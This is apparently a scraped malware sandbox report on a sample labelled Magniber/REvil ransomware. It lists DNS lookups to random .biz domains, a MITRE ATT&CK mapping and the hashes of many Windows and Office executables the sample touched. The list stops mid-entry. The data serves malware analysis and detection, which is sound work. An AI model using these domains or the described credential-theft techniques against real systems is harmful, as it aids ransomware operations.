xnxvnn.biz

DNS Response

13.251.16.150
8.8.8.8:53

ihcnogskt.biz

dns

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

59 B
75 B
1
1

DNS Request

ihcnogskt.biz

DNS Response

35.164.78.200
8.8.8.8:53

ihcnogskt.biz

dns

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

59 B
75 B
1
1

DNS Request

ihcnogskt.biz

DNS Response

35.164.78.200
8.8.8.8:53

kkqypycm.biz

dns

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

58 B
74 B
1
1

DNS Request

kkqypycm.biz

DNS Response

18.141.10.107
8.8.8.8:53

kkqypycm.biz

dns

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

58 B
74 B
1
1

DNS Request

kkqypycm.biz

DNS Response

18.141.10.107
8.8.8.8:53

uevrpr.biz

dns

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

56 B
72 B
1
1

DNS Request

uevrpr.biz

DNS Response

44.213.104.86
8.8.8.8:53

fgajqjyhr.biz

dns

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

59 B
75 B
1
1

DNS Request

fgajqjyhr.biz

DNS Response

34.211.97.45
8.8.8.8:53

uevrpr.biz

dns

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

56 B
72 B
1
1

DNS Request

uevrpr.biz

DNS Response

44.213.104.86
8.8.8.8:53

fgajqjyhr.biz

dns

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

59 B
75 B
1
1

DNS Request

fgajqjyhr.biz

DNS Response

34.211.97.45
8.8.8.8:53

hagujcj.biz

dns

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

57 B
73 B
1
1

DNS Request

hagujcj.biz

DNS Response

18.208.156.248
8.8.8.8:53

sctmku.biz

dns

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

56 B
72 B
1
1

DNS Request

sctmku.biz

DNS Response

35.164.78.200
8.8.8.8:53

hagujcj.biz

dns

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

115 B
147 B
2
2

DNS Request

hagujcj.biz

DNS Response

18.208.156.248

DNS Request

sewlqwcd.biz

DNS Response

44.221.84.105
8.8.8.8:53

sctmku.biz

dns

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

56 B
72 B
1
1

DNS Request

sctmku.biz

DNS Response

35.164.78.200
8.8.8.8:53

cwyfknmwh.biz

dns

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

59 B
121 B
1
1

DNS Request

cwyfknmwh.biz
8.8.8.8:53

qcrsp.biz

dns

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

55 B
71 B
1
1

DNS Request

qcrsp.biz

DNS Response

34.211.97.45
8.8.8.8:53

cwyfknmwh.biz

dns

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

59 B
121 B
1
1

DNS Request

cwyfknmwh.biz
8.8.8.8:53

qcrsp.biz

dns

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

55 B
71 B
1
1

DNS Request

qcrsp.biz

DNS Response

34.211.97.45
8.8.8.8:53

sewlqwcd.biz

dns

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

58 B
74 B
1
1

DNS Request

sewlqwcd.biz

DNS Response

44.221.84.105
8.8.8.8:53

dyjdrp.biz

dns

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

56 B
72 B
1
1

DNS Request

dyjdrp.biz

DNS Response

54.244.188.177
8.8.8.8:53

dyjdrp.biz

dns

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

56 B
72 B
1
1

DNS Request

dyjdrp.biz

DNS Response

54.244.188.177
8.8.8.8:53

napws.biz

dns

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

55 B
71 B
1
1

DNS Request

napws.biz

DNS Response

35.164.78.200
8.8.8.8:53

napws.biz

dns

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

55 B
71 B
1
1

DNS Request

napws.biz

DNS Response

35.164.78.200
8.8.8.8:53

qvuhsaqa.biz

dns

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

58 B
74 B
1
1

DNS Request

qvuhsaqa.biz

DNS Response

54.244.188.177
8.8.8.8:53

qvuhsaqa.biz

dns

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

58 B
74 B
1
1

DNS Request

qvuhsaqa.biz

DNS Response

54.244.188.177
8.8.8.8:53

apzzls.biz

dns

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

56 B
72 B
1
1

DNS Request

apzzls.biz

DNS Response

34.211.97.45
8.8.8.8:53

apzzls.biz

dns

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

56 B
72 B
1
1

DNS Request

apzzls.biz

DNS Response

34.211.97.45
8.8.8.8:53

krnsmlmvd.biz

dns

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

59 B
75 B
1
1

DNS Request

krnsmlmvd.biz

DNS Response

47.129.31.212
8.8.8.8:53

krnsmlmvd.biz

dns

2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

59 B
75 B
1
1

DNS Request

krnsmlmvd.biz

DNS Response

47.129.31.212

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Query Registry

T1012

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files (x86)\Common Files\microsoft shared\Source Engine\OSE.EXE

Filesize
1.3MB

MD5
6253001a14f2dac357eabb97ef546304

SHA1
4d262f5d17ac94cc1a6d36bda801160b48fc2a8e

SHA256
f8932088a9e1644b360ebe3d978013d4178b9fa6f69869ce704465e0cb8284f9

SHA512
66e7bbd168b91c045526de3b57e2a7d6cb9a5f3b2f5b7601deb4a75b2a9a6c26335d9cbdccda099164258c72d5b0820d4741c3518ed408710aed8306039b29ad

Download Submit
C:\Program Files (x86)\Microsoft Office\Office14\GROOVE.EXE

Filesize
30.1MB

MD5
4bc033536d7a2cfd99f0bca8bf05a0f1

SHA1
b33de502a850390cd192e681aca0bde828c77442

SHA256
402492369d97e8e70f3829defe703e14c73f3abc6921d00ff2ce0ff07ffe55ba

SHA512
b9d88ce46dcd1c9334dd3b9867168b8874e4cd04faadb9542d22e506d4e5fc1e024382cb6365979068b3fcfd2b4fa42127f84900be27d235b3292a34fb35190a

Download Submit
C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe

Filesize
1.4MB

MD5
26a11a0f22dc35259aff4d825bca783c

SHA1
876b687d9559f4264ce7b0b9f4c994e934bc6eb2

SHA256
fd56dda1455185b08e623566aebea68a3e8dbff37969e949020b6b9762692e4a

SHA512
f34644b38ca9194512f7272c49fc1b3a854fccbc2d2da558a1cc777fa96d1ac4699702c34464ba188a5564f07b7890bb0bcd0cc013759c73204a45ab9d7946e3

Download Submit
C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE

Filesize
5.2MB

MD5
4bf06e83225dd2417a4b4159347359fc

SHA1
5a2fcba1b6280fcf387a880369bb8fab4cd730e6

SHA256
89db73a662a9e493d73ac8cb4dc880bbaaa6ce091d2f84a89da4b2aff9b243e9

SHA512
afb48d9096142163ed88513de32c7262bbec025b78b705792e5f11951283550e24030826ed1b393114a871616adb4213402e6a018f9d51963f6824ee2321ee07

Download Submit
C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe

Filesize
2.1MB

MD5
ed4095ee350d68d0391c831f273d952a

SHA1
de05fac8be9e8086b7bab616c1f078a6334e934e

SHA256
3d21d4d97ae9e649f2807dd5aecf375af02387bdf27a7bde86d33cd982508ec4

SHA512
a4c9c366667193b7983b40b05ac64a8a3e4c0a362a1740de177dd0a1bd01e07ccef72d9df79ee87b3feadfb362bbd407511b2fee9886dd3b720a2bc69b1a0634

Download Submit
C:\Program Files\Windows Media Player\wmpnetwk.exe

Filesize
2.0MB

MD5
1f59b06625339596dc93c2f46f365c3e

SHA1
47eb9e63d16f0a381d718fec1fc967b96fcb5aed

SHA256
33524bd302d86473b05ae11cd3fe7ad2a8e6c581b9122714af2572612eb404f3

SHA512
2ef7708eaebc1ffb030d58902e79286ce8c8d059f55cadb28110778c043b47800e178b00c6e8986c090bb0d4c56febb5b9b9e12957df3e0f59927f5f076c23f2

Download Submit
C:\ProgramData\Microsoft\Search\Data\Applications\Windows\MSS.log

Filesize
1024KB

MD5
6055cf892a89d7a80ac91f0125a0a6fa

SHA1
5af1dedba22b09023d03de76835bc4768bc83c6c

SHA256
c7ce31c965c402bd66d9dc2e42f0bcc29779308c94a2d0885da493349d464b99

SHA512
cc37c0078e792b93ac75d4dc4469dab3cfde4dfe9c64af8a4c0284b183f9ea9949baf11b3cef646e778af91ea9b7f4fe4d82a531098cac595ffbe335a841ed6c

Download Submit
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorsvw.exe

Filesize
1.3MB

MD5
797d4580e7971395f0e0e33db702c2ee

SHA1
41fb9fe2a730836aef8d12b6834aae398ab5b46b

SHA256
608f66dfe09163efb00a36ddc8f13ce1d7ead38744622605af7abbcfc3d6e09c

SHA512
8bc31c7bc5df5eb552783bd143f28d462b9452c87d33e3cc74529b313d72b9710598ab966417009890c4e503484ec0fb7dd931afc14358eae18b5947a5f92799

Download Submit
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\ngen_service.log

Filesize
872KB

MD5
79595e31f5b6829a48551106ecf6cd5f

SHA1
09b5e8401318340cf0d26f3222703a718df8e78f

SHA256
bd4157e74c578beb3e2dc2a615e439f47b1cff78cf154432cdd26278dbe6e85f

SHA512
9e7803d6bdbb60a9ddb23e7b19f026fdb20c94031ee725bdf8b5f44a66de8de35611e680390cf61ad9b3cf820c80df05ec937506155dc3495d19fc62ad7a6387

Download Submit
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_state.exe

Filesize
1.2MB

MD5
285b4261c2c1d68f10c3d5afb58e92fd

SHA1
411b087e98bcd066e2eb95b04fa1369b7643021e

SHA256
d235c7651618272965ff305878c8ee193b5cf75eb4b9e4f372840f0781222935

SHA512
0e4579f57ac4076d2904af15692b6f2ec11b21db390c2b156b139be6a87d96a3e4459e73c3d8961a8e88f9f33a1d7dbf3d8dc8ebfd3776fb2d666e60264158da

Download Submit
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe

Filesize
1.3MB

MD5
1cf38f3b4f0e5b10c204938bf98cacb1

SHA1
cd57faa06c529a013302bbaf73d6c1ff567aa0a2

SHA256
c9814e860e62acc0b8ce5c14ca982a4f850d1c60f3e267ecf1f6338ae8b13043

SHA512
30754217e6ec8c7de67b02cb2fae13396f06a3213e2ed30728f61ceb0abd72715fea9d1305e2180cd6a3c1cfd8d4f3806077c835201e69a8eed7308127b4b8ab

Download Submit
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen_service.log

Filesize
8KB

MD5
edf5c82a09466e46c816e1dab547efc3

SHA1
c3f1149177ff40fdcdfd91f06a907ae47cc5004b

SHA256
0281359026d73f62997e7ce30c78f6ef9ef3c83b4000659d50b3aba0ab057d52

SHA512
9e371dd12f4b54ed2e69ad72b15168d37dcf4f54bd1137e456647907e8ffbaaa2fb01e694238baed0eae0e89b8c914d0e55faa1b5310754a99b862a3e410a1a1

Download Submit
C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorsvw.exe

Filesize
1.2MB

MD5
2835f98239b1db188be595c90f328f9d

SHA1
48e4170447c093b90888280048cef053724aba8a

SHA256
b426d92a83ce35a87ffca2e30fdf4b994a1bc144e957b2b3180c0fcff87c6057

SHA512
80887d492dcad954d2ed32830b7fc456304ab84dfc68236bcbae6718fa13ecbf861d0aaf721c261282f0e6954a4db5c72154f8f3d6b322d01541079aa6c749c0

Download Submit
C:\Windows\Microsoft.NET\Framework\v2.0.50727\ngen_service.log

Filesize
1003KB

MD5
9dc3960483c8f58a4371e6a792cdb102

SHA1
607b64e7c1d7a6226c2190dfa708787005d22a8e

SHA256
17488b356360a853ddd67003b5e8171a8054f26497f0eb24c427e3eb16ebdf99

SHA512
b72dd5d99e29f8f382462a3a4db386be03b8cee77f6666d690d1895e346e7f5677216af3eb2f06b7ff17d658fc71b695b82357712b71e5aba18f8a47c3220472

Download Submit
C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe

Filesize
1.3MB

MD5
ebf088bd2b0f224b691ca949f95751ac

SHA1
570a5e6facacc30f550498d3388a89f0f3fc6a8d

SHA256
3dbe3a6567c90f4c3e54f52d15e18bef05e3334414b3e739781fcfac9c8c728e

SHA512
f16e683bfff2973ce4e7b179b5689e4c97f500eec122ac411febc2fec80103b91cf3ca4a5765dbdbce16e9cfff75e670c1fefeda04eb38a4a8b8c7f3d54a1387

Download Submit
C:\Windows\SysWOW64\perfhost.exe

Filesize
1.2MB

MD5
c010c53d37a7a1f5d10cf61a829a7191

SHA1
8370d116ac07899c8761f8b63d6331967d5d7f72

SHA256
5dac3fd77611ddf312e2701389e8f967b3621eebe0f344b767e42a06e943d8ca

SHA512
ffcfaae37b7d17d769f01a369ddb95deb182e68e0acf4762b93a4801d7b2ecfdc6df829b27651496aec1d0203162f4fb96ff99603a2797698128d39f274229ee

Download Submit
C:\Windows\System32\SearchIndexer.exe

Filesize
1.1MB

MD5
e3c12a5624a6c27b842b888886ab5151

SHA1
0b74ef4cc807e60f0730c33b1e4eb5cf0d8af8c4

SHA256
515ace180ef6c7a019c6e3fb298934530bc116ef1268003daab782069cd6650b

SHA512
bd7b5aa119f2a3fd71b0cc08d5f925881d07262706cad319692c219b45294b4a95bc210bfbaf3e420b87d6fe7280d1aa5a696b3a96c05d813d47599320d3e039

Download Submit
C:\Windows\System32\VSSVC.exe

Filesize
2.1MB

MD5
ba0b788fabff51265d3d6b4ef625e587

SHA1
a4e33fb2cb87b02c0386446850260d2a19f60376

SHA256
d2ff24f46d4c29a6d1aec80ac631d1d4e6ef243a51ab978ffeffe888dabd3099

SHA512
31e5672f73cfe62f71f6fec72bc5785dc258db9f4d80717679be57fc22e04cfa8a7333c839d2d9abea41823327fed5ff14ceeeff7410156515f31fa3068034d9

Download Submit
C:\Windows\System32\ieetwcollector.exe

Filesize
1.3MB

MD5
7c6b82d2cf8bdca59edbe27d8d6a3e60

SHA1
fd0bd4b69404cab55e6b0df8ae0dfe3ab7633c91

SHA256
0666fb80a2fd26f441b312037cd3ada0e6e6cb4a2d0a99b07e106d0c754e0fef

SHA512
5abdda26e6c3ef29ccd7fc580edc8974131b9923caa0d4e8b7911459f88c5dbbea22078659aff77a3f8c6531f58ef7fbfa62479df7b51533d6685b858dcb0a42

Download Submit
C:\Windows\System32\vds.exe

Filesize
1.7MB

MD5
04b8633c3d00bfd4ecd5ffa1e3a699d5

SHA1
5e1f393166c60e11b86bd276da3516a735a1f101

SHA256
d740ea4e7eb02eaf331b2d24880bbfd775891d50208325627180014537bc5bf7

SHA512
bffbe0ad4bad2bc1ef4e8313079bda435e5d2c6c4be37c2738fa9b191496b178d77df67cc78bf531fd388edbb52e5470dee0da06574be48a06a0e937cdb7042c

Download Submit
C:\Windows\System32\wbengine.exe

Filesize
2.0MB

MD5
b9f3273661f6b90d3251f335f1a32d73

SHA1
9bcc7f455b811042773f043e0cc4b4e066a97eea

SHA256
7e67149c2c178447481ed6a00988e7badfa3005f98fdd7131aabe2671c43d58d

SHA512
77684a7f1093b529214b6904ea10ced5612e7061cb655dc000680ad99f69a259d1b2f00598fb05bbd635a98bc152a7bce95d746ffd0f81615052fe060002c93d

Download Submit
C:\Windows\Temp\CabB99F.tmp

Filesize
29KB

MD5
d59a6b36c5a94916241a3ead50222b6f

SHA1
e274e9486d318c383bc4b9812844ba56f0cff3c6

SHA256
a38d01d3f024e626d579cf052ac3bd4260bb00c34bc6085977a5f4135ab09b53

SHA512
17012307955fef045e7c13bf0613bd40df27c29778ba6572640b76c18d379e02dc478e855c9276737363d0ad09b9a94f2adaa85da9c77ebb3c2d427aa68e2489

Download Submit
C:\Windows\Temp\TarBB46.tmp

Filesize
81KB

MD5
b13f51572f55a2d31ed9f266d581e9ea

SHA1
7eef3111b878e159e520f34410ad87adecf0ca92

SHA256
725980edc240c928bec5a5f743fdabeee1692144da7091cf836dc7d0997cef15

SHA512
f437202723b2817f2fef64b53d4eb67f782bdc61884c0c1890b46deca7ca63313ee2ad093428481f94edfcecd9c77da6e72b604998f7d551af959dbd6915809c

Download Submit
C:\Windows\assembly\NativeImages_v2.0.50727_64\Microsoft-Windows-H#\a46df77acafec60e31859608625e6354\Microsoft-Windows-HomeGroupDiagnostic.NetListMgr.Interop.ni.dll

Filesize
105KB

MD5
d9c0055c0c93a681947027f5282d5dcd

SHA1
9bd104f4d6bd68d09ae2a55b1ffc30673850780f

SHA256
dc7eb30a161a2f747238c8621adb963b50227a596d802b5f9110650357f7f7ed

SHA512
5404050caa320cdb48a6ccd34282c12788ee8db4e00397dde936cee00e297e9e438dcaa5fcb4e92525f167637b500db074ac91971d4730d222ac4713a3e7b930

Download Submit
C:\Windows\assembly\NativeImages_v2.0.50727_64\Microsoft.Office.To#\82425dbc07ec64ab599534080b6fbc08\Microsoft.Office.Tools.v9.0.ni.dll

Filesize
248KB

MD5
4bbf44ea6ee52d7af8e58ea9c0caa120

SHA1
f7dcafcf850b4081b61ec7d313d7ec35d6ac66d2

SHA256
c89c478c2d7134cd28b3d28d4216ad6aa41de3edd9d87a227ec19cf1cbf3fb08

SHA512
c82356750a03bd6f92f03c67acdd5e1085fbd70533a8b314ae54676f37762d9ca5fa91574529b147d3e1c983bf042106b75f41206f5ddc37094a5e1c327c0fd3

Download Submit
C:\Windows\assembly\NativeImages_v2.0.50727_64\Microsoft.VisualStu#\06216e3a9e4ca262bc1e9a3818ced7fe\Microsoft.VisualStudio.Tools.Office.Excel.AddInAdapter.v9.0.ni.dll

Filesize
58KB

MD5
3d6987fc36386537669f2450761cdd9d

SHA1
7a35de593dce75d1cb6a50c68c96f200a93eb0c9

SHA256
34c0302fcf7d2237f914aaa484b24f5a222745f21f5b5806b9c519538665d9cb

SHA512
1d74371f0b6c68ead18b083c08b7e44fcaf930a16e0641ad6cd8d8defb4bde838377741e5b827f7f05d4f0ad4550b509ba6dff787f51fc6830d8f2c88dbf0e11

Download Submit
C:\Windows\assembly\NativeImages_v2.0.50727_64\Microsoft.VisualStu#\077a55be734d6ef6e2de59fa7325dac5\Microsoft.VisualStudio.Tools.Office.Contract.v9.0.ni.dll

Filesize
205KB

MD5
0a41e63195a60814fe770be368b4992f

SHA1
d826fd4e4d1c9256abd6c59ce8adb6074958a3e7

SHA256
4a8ccb522a4076bcd5f217437c195b43914ea26da18096695ee689355e2740e1

SHA512
1c916165eb5a2e30d4c6a67f2023ab5df4e393e22d9d8123aa5b9b8522fdb5dfe539bcb772a6e55219b23d865ee1438d066e78f0cb138a4a61cc2a1cecf54728

Download Submit
C:\Windows\assembly\NativeImages_v2.0.50727_64\Microsoft.VisualStu#\18a42623875c492aec60dc7c597f5b2e\Microsoft.VisualStudio.Tools.Office.Word.HostAdapter.v10.0.ni.dll

Filesize
305KB

MD5
8527a05a515d21bcba771674cd94cdb8

SHA1
5d6514e4a03ba7687913c535817de141837db988

SHA256
cf5fd7c434051ea3413080e8aecd67b24dcce465c7cfcb9a33980b86ef956f58

SHA512
9f3578fd0be6676893793769dc1ac5952459d730006d78b5167316f774579fedda628e6f6ad579f18510bbdf0b965ac7c75df80ed89590744d469b58473e75c4

Download Submit
C:\Windows\assembly\NativeImages_v2.0.50727_64\Microsoft.VisualStu#\1b5e7dbf74dbba751159d2e886f814d3\Microsoft.VisualStudio.Tools.Office.Outlook.HostAdapter.v10.0.ni.dll

Filesize
122KB

MD5
6d4fdc400d1bab9a62e31f4de3ecaf27

SHA1
efddceb116f941772970dbe37ceba87e9cfc06e8

SHA256
810ddd15738c08ef819572e4022c54fe149214c5c597a5c0da05ee498b9a5816

SHA512
590ce9ac0b665fc5784fadc3b59e63e2a3d5af2907a5bdb8409117c52278593354a116cc4d17b74d69559b47abf2b5f5d01c3a01535ba8f7310033e87cc5c838

Download Submit
C:\Windows\assembly\NativeImages_v2.0.50727_64\Microsoft.VisualStu#\2951791a1aa22719b6fdcb816f7e6c04\Microsoft.VisualStudio.Tools.Office.Contract.v10.0.ni.dll

Filesize
43KB

MD5
68c51bcdc03e97a119431061273f045a

SHA1
6ecba97b7be73bf465adf3aa1d6798fedcc1e435

SHA256
4a3aa6bd2a02778759886aaa884d1e8e4a089a1e0578c973fcb4fc885901ebaf

SHA512
d71d6275c6f389f6b7becb54cb489da149f614454ae739e95c33a32ed805820bef14c98724882c4ebb51b4705f41b3cdb5a8ed134411011087774cac6e9d23e8

Download Submit
C:\Windows\assembly\NativeImages_v2.0.50727_64\Microsoft.VisualStu#\369a81b278211f8d96a305e918172713\Microsoft.VisualStudio.Tools.Applications.Runtime.v9.0.ni.dll

Filesize
198KB

MD5
9d9305a1998234e5a8f7047e1d8c0efe

SHA1
ba7e589d4943cd4fc9f26c55e83c77559e7337a8

SHA256
469ff9727392795925c7fe5625afcf508ba07e145c7940e4a12dbd6f14afc268

SHA512
58b8cc718ae1a72a9d596f7779aeb0d5492a19e5d668828fd6cff1aa37181cc62878799b4c97beec9c71c67a0c215162ff544b2417f6017cd892a1ce64f7878c

Download Submit
C:\Windows\assembly\NativeImages_v2.0.50727_64\Microsoft.VisualStu#\6e100177db1ef25970ca4a9eba03c352\Microsoft.VisualStudio.Tools.Applications.Contract.v9.0.ni.dll

Filesize
70KB

MD5
57b601497b76f8cd4f0486d8c8bf918e

SHA1
da797c446d4ca5a328f6322219f14efe90a5be54

SHA256
1380d349abb6d461254118591637c8198859d8aadfdb098b8d532fdc4d776e2d

SHA512
1347793a9dbff305975f4717afa9ee56443bc48586d35a64e8a375535fa9e0f6333e13c2267d5dbb7fe868aa863b23034a2e655dcd68b59dca75f17a4cbc1850

Download Submit
C:\Windows\assembly\NativeImages_v2.0.50727_64\Microsoft.VisualStu#\77f00d3b4d847c1dd38a1c69e4ef5cb1\Microsoft.VisualStudio.Tools.Applications.Runtime.v10.0.ni.dll

Filesize
87KB

MD5
ed5c3f3402e320a8b4c6a33245a687d1

SHA1
4da11c966616583a817e98f7ee6fce6cde381dae

SHA256
b58d8890d884e60af0124555472e23dee55905e678ec9506a3fbe00fffab0a88

SHA512
d664b1f9f37c50d0e730a25ff7b79618f1ca99a0f1df0b32a4c82c95b2d15b6ef04ce5560db7407c6c3d2dff70514dac77cb0598f6d32b25362ae83fedb2bc2a

Download Submit
C:\Windows\assembly\NativeImages_v2.0.50727_64\Microsoft.VisualStu#\7d5e6e5f266182169019c54afe9d41e4\Microsoft.VisualStudio.Tools.Office.HostAdapter.v10.0.ni.dll

Filesize
221KB

MD5
3c111736d3cd9e168bd11befbbf51182

SHA1
b6ef9a59b82e1a54e33d317f2ae8f8a5b4d0a478

SHA256
a0993a04b8057327be69f9484b144d8222518b6f774f8d9c4fd150d3c61e4a2e

SHA512
0e4e9460304a9e4d48c4956f614b8e2a1deb56f69580b37a288ce17426f305a68b1449942b69dc5b518fbdc8b2a407c94975659d793227135a5bbd96b2b57968

Download Submit
C:\Windows\assembly\NativeImages_v2.0.50727_64\Microsoft.VisualStu#\7e6d5e83462a25f9a5f9673191ac2923\Microsoft.VisualStudio.Tools.Office.Excel.HostAdapter.v10.0.ni.dll

Filesize
271KB

MD5
dbeebf607570037c9bb0971096881f6f

SHA1
470d97b8c15d016b2e1e7fa9f108eb9435cc7063

SHA256
e0b92575a012e250b0633c2fcec98e36eeefbc773c107d7eb24ffb0bff79246a

SHA512
6245deac38da5963f56479205bb40ca75ba7f51d3ababc70ff126560c15bf38ec0e9474cefba2285515da82eb8472f7cff146a6402d59a12f3924cc0c01b8bdc

Download Submit
C:\Windows\assembly\NativeImages_v2.0.50727_64\Microsoft.VisualStu#\9e076728e51ab285a8bc0f0b0a226e2c\Microsoft.VisualStudio.Tools.Applications.HostAdapter.v10.0.ni.dll

Filesize
82KB

MD5
2eeeff61d87428ae7a2e651822adfdc4

SHA1
66f3811045a785626e6e1ea7bab7e42262f4c4c1

SHA256
37f2ee9f8794df6d51a678c62b4838463a724fdf1bd65277cd41feaf2e6c9047

SHA512
cadf3a04aa6dc2b6b781c292d73e195be5032b755616f4b49c6bdde8b3ae297519fc255b0a46280b60aaf45d4dedb9b828d33f1400792b87074f01bbab19e41a

Download Submit
C:\Windows\assembly\NativeImages_v2.0.50727_64\Microsoft.VisualStu#\a58534126a42a5dbdef4573bac06c734\Microsoft.VisualStudio.Tools.Office.Word.AddInAdapter.v9.0.ni.dll

Filesize
58KB

MD5
a8b651d9ae89d5e790ab8357edebbffe

SHA1
500cff2ba14e4c86c25c045a51aec8aa6e62d796

SHA256
1c8239c49fb10c715b52e60afd0e6668592806ef447ad0c52599231f995a95d7

SHA512
b4d87ee520353113bb5cf242a855057627fde9f79b74031ba11d5feee1a371612154940037954cd1e411da0c102f616be72617a583512420fd1fc743541a10ce

Download Submit
C:\Windows\assembly\NativeImages_v2.0.50727_64\Microsoft.VisualStu#\bd1950e68286b869edc77261e0821c93\Microsoft.VisualStudio.Tools.Applications.AddInAdapter.v9.0.ni.dll

Filesize
85KB

MD5
5180107f98e16bdca63e67e7e3169d22

SHA1
dd2e82756dcda2f5a82125c4d743b4349955068d

SHA256
d0658cbf473ef3666c758d28a1c4bcdcb25b2e515ad5251127d0906e65938f01

SHA512
27d785971c28181cf9115ab14de066931c4d81f8d357ea8b9eabfe0f70bd5848023b69948ac6a586989e892bcde40999f8895a0bd2e7a28bac7f2fa64bb22363

Download Submit
C:\Windows\assembly\NativeImages_v2.0.50727_64\Microsoft.VisualStu#\dbe51d156773fefd09c7a52feeb8ff79\Microsoft.VisualStudio.Tools.Office.AddInAdapter.v9.0.ni.dll

Filesize
298KB

MD5
5fd34a21f44ccbeda1bf502aa162a96a

SHA1
1f3b1286c01dea47be5e65cb72956a2355e1ae5e

SHA256
5d88539a1b7be77e11fe33572606c1093c54a80eea8bd3662f2ef5078a35ce01

SHA512
58c3904cd1a06fbd3a432b3b927e189a744282cc105eda6f0d7f406971ccbc942c7403c2dcbb2d042981cf53419ca5e2cf4d9f57175e45cc5c484b0c121bb125

Download Submit
C:\Windows\assembly\NativeImages_v2.0.50727_64\Microsoft.VisualStu#\fe8d06712eb58d0150803744020b072a\Microsoft.VisualStudio.Tools.Applications.Contract.v10.0.ni.dll

Filesize
43KB

MD5
dd1dfa421035fdfb6fd96d301a8c3d96

SHA1
d535030ad8d53d57f45bc14c7c7b69efd929efb3

SHA256
f71293fe6cf29af54d61bd2070df0a5ff17a661baf1b0b6c1d3393fd23ccd30c

SHA512
8e0f2bee9801a4eba974132811d7274e52e6e17ccd60e8b3f74959994f007bdb0c60eb9facb6321c0fdfbcc44e9a77d8c5c776d998ccce256fa864338a6f63b1

Download Submit
C:\Windows\assembly\NativeImages_v2.0.50727_64\ehiActivScp\ee22f412f6314443add3ca412afd6569\ehiActivScp.ni.dll

Filesize
124KB

MD5
929653b5b019b4555b25d55e6bf9987b

SHA1
993844805819ee445ff8136ee38c1aee70de3180

SHA256
2766353ca5c6a87169474692562282005905f1ca82eaa08e08223fc084dbb9a2

SHA512
effc809cca6170575efa7b4b23af9c49712ee9a7aaffd8f3a954c2d293be5be2cf3c388df4af2043f82b9b2ea041acdbb9d7ddd99a2fc744cce95cf4d820d013

Download Submit
C:\Windows\assembly\NativeImages_v2.0.50727_64\ehiVidCtl\11d57f5c033326954c0bc4f0b2680812\ehiVidCtl.ni.dll

Filesize
2.1MB

MD5
10b5a285eafccdd35390bb49861657e7

SHA1
62c05a4380e68418463529298058f3d2de19660d

SHA256
5f3bb3296ab50050e6b4ea7e95caa937720689db735c70309e5603a778be3a9a

SHA512
19ff9ac75f80814ed5124adc25fc2a6d1d7b825c770e1edb8f5b6990e44f9d2d0c1c0ed75b984e729709d603350055e5a543993a80033367810c417864df1452

Download Submit
C:\Windows\assembly\NativeImages_v2.0.50727_64\stdole\70f1aed4a280583cbd09e0f5d9bbc1f5\stdole.ni.dll

Filesize
88KB

MD5
1f394b5ca6924de6d9dbfb0e90ea50ef

SHA1
4e2caa5e98531c6fbf5728f4ae4d90a1ad150920

SHA256
9db0e4933b95ad289129c91cd9e14a0c530f42b55e8c92dc8c881bc3dd40b998

SHA512
e27ea0f7b59d41a85547d607ae3c05f32ce19fa5d008c8eaf11d0c253a73af3cfa6df25e3ee7f3920cd775e1a3a2db934e5891b4aafd4270d65a727b439f7476

Download Submit
\Windows\System32\Locator.exe

Filesize
1.2MB

MD5
4ba96416cf26f2b90fea206f82a12e4e

SHA1
c39d42b50d98a977aa85bc7e19730935e72a0253

SHA256
bfdbe4eaa3d2fb786245c2ae5deb6a36d7b5a5f35958281a5454ad5630c1cf66

SHA512
f07db8e5f4f30ac53dd877e77c3ffde4aabeb2151666de057f548fdc8acdedfb5a2468bf0f264ddd1ae428ac2a5c9845db229bcc834fefebb144d10db5fe0edd

Download Submit
\Windows\System32\alg.exe

Filesize
1.3MB

MD5
feefe7b457a18d4bbaacf3a15c3ea1aa

SHA1
